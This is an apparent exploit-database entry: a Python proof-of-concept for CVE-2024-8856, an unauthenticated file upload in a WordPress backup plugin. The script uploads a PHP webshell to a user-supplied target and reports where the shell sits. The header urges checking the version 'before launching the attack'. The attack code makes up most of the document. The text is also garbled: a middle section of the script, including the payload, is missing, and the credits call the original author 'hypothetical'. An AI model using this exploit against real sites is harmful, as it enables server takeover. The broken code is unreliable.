<\/p>\n
# Exploit Title: WordPress Backup and Staging Plugin \u2264 1.21.16 - Arbitrary File Upload to RCE
\n# Original Author: Patchstack (hypothetical)
\n# Exploit Author: Al Baradi Joy
\n# Exploit Date: April 5, 2025
\n# Vendor Homepage: https:\/\/wp-timecapsule.com\/
\n# Software Link: https:\/\/wordpress.org\/plugins\/wp-time-capsule\/
\n# Version: Up to and including 1.21.16
\n# Tested Versions: 1.21.16
\n# CVE ID: CVE-2024-8856
\n# Vulnerability Type: Arbitrary File Upload \/ Remote Code Execution
\n# Description:
\n# The WordPress plugin \"Backup and Staging by WP Time Capsule\" up to version 1.21.16
\n# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
\n# This can lead to remote code execution if a PHP file is uploaded and executed directly
\n# from the wp-content\/plugins\/wp-time-capsule\/wp-tcapsule-bridge\/ directory.
\n# Proof of Concept: Yes
\n# Categories: WordPress Plugin, File Upload, RCE
\n# CVSS Score: 9.9 (Critical)
\n# CVSS Vector: CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H
\n# Notes:
\n# Successful exploitation provides shell access as the user running the web server.
\n# Ensure target is using the vulnerable plugin version before launching the attack.
\n
\nimport requests
\n
\n# Banner
\ndef display_banner():
\nprint(\"=\"*80)
\nprint(\"Exploit Title: CVE-2024-8856 - WordPress Backup and Staging
\nPlugin Arbitrary File Upload\")
\nprint(\"Made By Al Baradi Joy\")
\nprint(\"=\"*80)
\n
\n# Function to detect if the target supports HTTPS or falls back to HTTP
\ndef detect_protocol(domain):
\nhttps_url = f\"https:\/\/{domain}\"
\nhttp_url = f\"http:\/\/{domain}\"
\n
\ntry:
\nresponse = requests.get(https_url, timeout=5, allow_redirects=True)
\nif response.status_code ',
\n'application\/x-php')
\n}
\n
\ntry:
\nprint(f\"[+] Attempting to upload shell to: {upload_url}\")
\nresponse = requests.post(upload_url, files=files, timeout=10)
\n
\nif response.status_code == 200:
\nprint(f\"[\u2714] Exploit successful! Webshell available at:
\n{shell_url}\")
\nelse:
\nprint(f\"[\u2716] Failed to upload shell. Status code:
\n{response.status_code}\")
\n
\nexcept requests.exceptions.ConnectionError:
\nprint(\"[\u2716] Connection failed. Target may be down.\")
\nexcept requests.exceptions.Timeout:
\nprint(\"[\u2716] Request timed out. Target is slow or unresponsive.\")
\nexcept requests.exceptions.RequestException as e:
\nprint(f\"[\u2716] Unexpected error: {e}\")
\n
\n# Main execution
\nif __name__ == \"__main__\":
\ndisplay_banner()
\ntarget = input(\"[?] Enter the target URL (without http\/https):
\n\").strip()
\nexploit(target)\n <\/code><\/pre>\n<\/p><\/div>\n